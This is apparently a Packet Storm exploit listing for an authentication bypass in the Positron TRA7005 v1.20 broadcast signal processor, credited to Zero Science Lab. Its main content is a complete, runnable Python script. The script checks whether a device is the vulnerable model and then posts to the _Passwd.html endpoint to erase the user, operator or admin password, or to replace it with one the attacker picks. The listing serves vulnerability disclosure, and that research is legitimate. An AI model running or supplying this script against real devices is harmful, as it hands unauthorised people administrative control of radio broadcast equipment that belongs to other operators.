what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Positron Broadcast Signal Processor TRA7005 1.20 Authentication Bypass

Positron Broadcast Signal Processor TRA7005 1.20 Authentication Bypass
Posted Apr 4, 2024
Authored by LiquidWorm | Site zeroscience.mk

The Positron Broadcast Digital Signal Processor TRA7005 version 1.20 suffers from an authentication bypass through a direct and unauthorized access to the password management functionality. The vulnerability allows attackers to bypass Digest authentication by manipulating the password endpoint _Passwd.html and its payload data to set a user's password to arbitrary value or remove it entirely. This grants unauthorized access to protected areas (/user, /operator, /admin) of the application without requiring valid credentials, compromising the device's system security.

tags | exploit, arbitrary
SHA-256 | e8bf7735882d4c05983b6e675cc30c123bd15be6138cd6e0ef2ac21890428ded

Positron Broadcast Signal Processor TRA7005 1.20 Authentication Bypass

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit
#
#
# Vendor: Positron srl
# Product web page: https://www.positron.it
# https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
# Affected version: 1.20
# TRA7K5_REV107
# TRA7K5_REV106
# TRA7K5_REV104
# TRA7K5_REV102
#
# Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
# guarantee an excellent quality-price ratio in compliance with current regulations and
# intended for individual broadcasters or radio networks. All models in the TRA7000 series
# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
# for both analogue and digital audio inputs, change-over emergency switching between any
# input with adjustable thresholds and intervention times, both in the switching phase on
# the secondary source and in the return phase to the primary source. Ethernet connection
# with Web-Server (optional) for total control and management of the device. Advanced BYPASS
# system between MPX input and outputs, active on operating and power supply anomalies and
# can also be activated remotely.
#
# Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
# bypass through a direct and unauthorized access to the password management functionality.
# The vulnerability allows attackers to bypass Digest authentication by manipulating the
# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
# value or remove it entirely. This grants unauthorized access to protected areas (/user,
# /operator, /admin) of the application without requiring valid credentials, compromising
# the device's system security.
#
# Tested on: Positron Web Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2024-5813
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
#
#
# 22.03.2024
#
#


import requests,sys

print("""
______________________________________
┏┳┓• ┏┓ ┓ ┏┓ ┓ •
┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋
┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗
┛ ┛
for
Positron Digital Signal Processor
ZSL-2024-5813
______________________________________
""")

if len(sys.argv) != 4:
print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")
sys.exit(1)

ip = sys.argv[1]
ut = sys.argv[2]
wa = sys.argv[3]

valid_ut = ['user', 'oper', 'admin']
if ut.lower() not in valid_ut:
print("Invalid user type! Use 'user', 'oper', or 'admin'.")
sys.exit(1)

url = f'http://{ip}/_Passwd.html'
did = f'http://{ip}/_Device.html'

try:
r = requests.get(did)
if r.status_code == 200 and 'TRA7K5' in r.text:
print("Vulnerable processor found!")
else:
print("Not Vulnerable or not applicable. Exploit exiting.")
sys.exit(1)
except requests.exceptions.RequestException as e:
print(f"Error checking device: {e}")
sys.exit(1)

headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept-Language': 'mk-MK,en;q=0.6',
'Accept-Encoding': 'gzip, deflate',
'User-Agent' : 'R-Marina/11.9',
'Accept' : '*/*'
}

payload = {}
if wa.lower() == 'erase':
payload[f'PSW_{ut.capitalize()}'] = 'NONE'
else:
payload_key = f'PSW_{ut.capitalize()}'
payload[payload_key] = wa
#print(payload)

r = requests.post(url, headers=headers, data=payload)
print(r.status_code)
print(r.text)
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close